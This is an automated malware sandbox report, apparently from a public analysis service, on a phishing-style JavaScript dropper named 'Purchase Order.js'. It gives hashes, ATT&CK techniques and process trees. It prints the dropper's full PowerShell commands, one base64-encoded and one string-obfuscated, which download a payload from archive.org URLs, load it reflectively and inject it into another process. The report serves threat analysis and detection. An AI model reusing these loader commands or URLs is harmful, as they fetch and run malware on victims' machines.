879fa7f8b4bff5ac3937d842473a06c94d8806793d0ed4c6649355f3b62f2719

General

Target

Purchase Order.js
Size

602KB
MD5

c23145032eb9417255ffe33e719afaf2
SHA1

b0a2b6174179ef5d05489253802030b4fda20165
SHA256

61f366924b6047fc1edf5494e19322990fcd3544641cdf26c63d893116a712ee
SHA512

fcb72da665866518fac8a02081cda1fa988aa47c8dc4ec25fe18063637117c7c693de71a2914eefbb89431fcf964857e07fdfce5cb6bf8a5f4919951e8f9835e
SSDEEP

12288:L0jCPxgfEU+BG/njP9Rc8AfSeh/xxvLmKiinJ/9xuaRZb7bIsDvZX9i4Mw61uBKW:nsbdc52Gz/SkD9

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://ia904601.us.archive.org/6/items/detah-note-j/DetahNoteJ.txt

exe.dropper

https://ia904601.us.archive.org/6/items/detah-note-j/DetahNoteJ.txt

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
3	2788	powershell.exe
4	2788	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2824	powershell.exe
2788	powershell.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2824	powershell.exe
2788	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2824	powershell.exe
Token: SeDebugPrivilege	2788	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 2728 wrote to memory of 2824	2728	wscript.exe	30
PID 2728 wrote to memory of 2824	2728	wscript.exe	30
PID 2728 wrote to memory of 2824	2728	wscript.exe	30
PID 2824 wrote to memory of 2788	2824	powershell.exe	32
PID 2824 wrote to memory of 2788	2824	powershell.exe	32
PID 2824 wrote to memory of 2788	2824	powershell.exe	32

C:\Windows\system32\wscript.exe
wscript.exe "C:\Users\Admin\AppData\Local\Temp\Purchase Order.js"
1⤵
- Suspicious use of WriteProcessMemory
PID:2728
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LgAgACgAIAAkAHMAaABFAGwATABpAGQAWwAxAF0AKwAkAFMAaABlAGwATABpAEQAWwAxADMAXQArACcAWAAnACkAKAAoACgAJwB7ADEAfQB1ACcAKwAnAHIAJwArACcAbAAgAD0AIAB7ACcAKwAnADAAfQBoAHQAJwArACcAdAAnACsAJwBwACcAKwAnAHMAOgAvACcAKwAnAC8AJwArACcAaQBhACcAKwAnADkAMAA0ADYAMAAxAC4AdQBzACcAKwAnAC4AJwArACcAYQByAGMAaAAnACsAJwBpAHYAZQAuACcAKwAnAG8AcgBnAC8ANgAvAGkAdABlAG0AcwAvACcAKwAnAGQAZQB0ACcAKwAnAGEAaAAtAG4AbwB0AGUALQBqAC8ARABlAHQAYQBoAE4AbwAnACsAJwB0AGUASgAuAHQAeAB0AHsAMAAnACsAJwB9ADsAJwArACcAewAxAH0AYgBhAHMAZQA2ACcAKwAnADQAQwBvAG4AdABlAG4AdAAgAD0AJwArACcAIAAnACsAJwAoACcAKwAnAE4AZQB3AC0ATwBiAGoAJwArACcAZQBjAHQAJwArACcAIABTACcAKwAnAHkAcwB0ACcAKwAnAGUAbQAnACsAJwAuAE4AZQB0AC4AVwBlACcAKwAnAGIAJwArACcAQwAnACsAJwBsAGkAZQAnACsAJwBuACcAKwAnAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTACcAKwAnAHQAcgBpACcAKwAnAG4AJwArACcAZwAoAHsAMQB9AHUAcgBsACkAOwB7ADEAfQAnACsAJwBiAGkAbgBhAHIAeQBDAG8AJwArACcAbgB0ACcAKwAnAGUAJwArACcAbgB0ACAAPQAgAFsAUwB5AHMAJwArACcAdAAnACsAJwBlAG0ALgBDAG8AbgAnACsAJwB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgAnACsAJwBhACcAKwAnAHMAZQAnACsAJwA2ACcAKwAnADQAUwB0ACcAKwAnAHIAaQBuACcAKwAnAGcAKAB7ADEAfQAnACsAJwBiAGEAcwBlADYANAAnACsAJwBDACcAKwAnAG8AbgAnACsAJwB0ACcAKwAnAGUAbgB0ACkAOwB7ADEAfQBhAHMAcwAnACsAJwBlACcAKwAnAG0AYgBsACcAKwAnAHkAIAA9ACAAWwAnACsAJwBSACcAKwAnAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtACcAKwAnAGIAbAAnACsAJwB5AF0AJwArACcAOgAnACsAJwA6AEwAbwBhAGQAKAB7ADEAfQBiACcAKwAnAGkAbgAnACsAJwBhACcAKwAnAHIAeQBDAG8AbgB0AGUAJwArACcAbgAnACsAJwB0ACkAOwAnACsAJwB7ADEAfQB0AHkAcABlACAAPQAgAHsAMQAnACsAJwB9AGEAJwArACcAcwBzAGUAJwArACcAbQBiAGwAJwArACcAeQAuAEcAZQAnACsAJwB0ACcAKwAnAFQAeQAnACsAJwBwACcAKwAnAGUAJwArACcAKAB7ADAAfQAnACsAJwBSACcAKwAnAHUAbgBQAEUALgBIAG8AbQBlAHsAMAAnACsAJwB9ACkAOwB7ADEAJwArACcAfQBtAGUAdAAnACsAJwBoAG8AZAAnACsAJwAgAD0AIAB7ADEAfQB0AHkAcABlAC4AJwArACcARwBlAHQATQBlAHQAaABvAGQAJwArACcAKAB7ACcAKwAnADAAJwArACcAfQBWAEEAJwArACcASQB7ACcAKwAnADAAfQAnACsAJwApACcAKwAnADsAewAxAH0AbQBlAHQAaABvAGQALgBJACcAKwAnAG4AdgAnACsAJwBvACcAKwAnAGsAJwArACcAZQAoAHsAMQAnACsAJwB9ACcAKwAnAG4AdQAnACsAJwBsAGwALAAnACsAJwAgAFsAbwBiAGoAZQBjAHQAWwBdACcAKwAnAF0AQAAoAHsAMAB9AHQAeAAnACsAJwB0AC4AcwBvAGsAaQAvAHYAJwArACcAZQBkAC4AMgByAC4AMwA5AGIAJwArACcAMwA0ADUAMwAwADIAYQAwADcAJwArACcANQAnACsAJwBiADEAJwArACcAYgBjACcAKwAnADAAZAA0ADUAYgA2ADMAJwArACcAMgBlAGIAOQBlAGUANgAyACcAKwAnAC0AJwArACcAYgAnACsAJwB1AHAAJwArACcALwAnACsAJwAvADoAcwBwACcAKwAnAHQAdAAnACsAJwBoAHsAJwArACcAMAB9ACAAJwArACcALAAgAHsAMAB9AGQAZQBzACcAKwAnAGEAdAAnACsAJwBpAHYAYQAnACsAJwBkACcAKwAnAG8AewAnACsAJwAwAH0AIAAsACAAewAwACcAKwAnAH0AZABlAHMAYQB0AGkAJwArACcAdgBhACcAKwAnAGQAbwB7ADAAfQAgACwAIAB7ADAAfQBkACcAKwAnAGUAJwArACcAcwBhACcAKwAnAHQAJwArACcAaQB2AGEAZAAnACsAJwBvACcAKwAnAHsAJwArACcAMAB9ACwAJwArACcAewAnACsAJwAwACcAKwAnAH0AQQAnACsAJwBkAGQAJwArACcASQAnACsAJwBuAFAAJwArACcAcgAnACsAJwBvACcAKwAnAGMAZQAnACsAJwBzAHMAMwAnACsAJwAyACcAKwAnAHsAMAB9ACwAewAnACsAJwAwAH0AZAAnACsAJwBlACcAKwAnAHMAYQAnACsAJwB0AGkAdgBhACcAKwAnAGQAbwB7ACcAKwAnADAAfQAnACsAJwApACkAOwAnACkAIAAtAGYAIABbAGMASABhAHIAXQAzADkALABbAGMASABhAHIAXQAzADYAKQApAA==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2824
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $shElLid[1]+$ShelLiD[13]+'X')((('{1}u'+'r'+'l = {'+'0}ht'+'t'+'p'+'s:/'+'/'+'ia'+'904601.us'+'.'+'arch'+'ive.'+'org/6/items/'+'det'+'ah-note-j/DetahNo'+'teJ.txt{0'+'};'+'{1}base6'+'4Content ='+' '+'('+'New-Obj'+'ect'+' S'+'yst'+'em'+'.Net.We'+'b'+'C'+'lie'+'n'+'t).DownloadS'+'tri'+'n'+'g({1}url);{1}'+'binaryCo'+'nt'+'e'+'nt = [Sys'+'t'+'em.Con'+'vert]::FromB'+'a'+'se'+'6'+'4St'+'rin'+'g({1}'+'base64'+'C'+'on'+'t'+'ent);{1}ass'+'e'+'mbl'+'y = ['+'R'+'eflection.Assem'+'bl'+'y]'+':'+':Load({1}b'+'in'+'a'+'ryConte'+'n'+'t);'+'{1}type = {1'+'}a'+'sse'+'mbl'+'y.Ge'+'t'+'Ty'+'p'+'e'+'({0}'+'R'+'unPE.Home{0'+'});{1'+'}met'+'hod'+' = {1}type.'+'GetMethod'+'({'+'0'+'}VA'+'I{'+'0}'+')'+';{1}method.I'+'nv'+'o'+'k'+'e({1'+'}'+'nu'+'ll,'+' [object[]'+']@({0}tx'+'t.soki/v'+'ed.2r.39b'+'345302a07'+'5'+'b1'+'bc'+'0d45b63'+'2eb9ee62'+'-'+'b'+'up'+'/'+'/:sp'+'tt'+'h{'+'0} '+', {0}des'+'at'+'iva'+'d'+'o{'+'0} , {0'+'}desati'+'va'+'do{0} , {0}d'+'e'+'sa'+'t'+'ivad'+'o'+'{'+'0},'+'{'+'0'+'}A'+'dd'+'I'+'nP'+'r'+'o'+'ce'+'ss3'+'2'+'{0},{'+'0}d'+'e'+'sa'+'tiva'+'do{'+'0}'+'));') -f [cHar]39,[cHar]36))"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2788

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

2

T1059

JavaScript

1

T1059.007

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
5b3903ab190ace14b93229456fa92004

SHA1
b76555e6e401818769616326afe8f8ed43c05f03

SHA256
e5bf56e5dec71823a1ea6ef88cd9c19cadef992560f8eacf63448eb96a1dac42

SHA512
77661b76230ebf787cd87b015cc33e5c77d88f681bb98aecff9963f1898dfc6a7754073f94069d47a957be552508660a76574e4ecc1e1ae618aafbbeeb71df57

Download Submit
memory/2824-4-0x000007FEF518E000-0x000007FEF518F000-memory.dmp

Filesize
4KB

Download
memory/2824-5-0x000000001B4D0000-0x000000001B7B2000-memory.dmp

Filesize
2.9MB

Download
memory/2824-6-0x0000000002630000-0x0000000002638000-memory.dmp

Filesize
32KB

Download
memory/2824-7-0x000007FEF4ED0000-0x000007FEF586D000-memory.dmp

Filesize
9.6MB

Download
memory/2824-8-0x000007FEF4ED0000-0x000007FEF586D000-memory.dmp

Filesize
9.6MB

Download
memory/2824-9-0x000007FEF4ED0000-0x000007FEF586D000-memory.dmp

Filesize
9.6MB

Download
memory/2824-10-0x000007FEF4ED0000-0x000007FEF586D000-memory.dmp

Filesize
9.6MB

Download
memory/2824-16-0x000007FEF4ED0000-0x000007FEF586D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing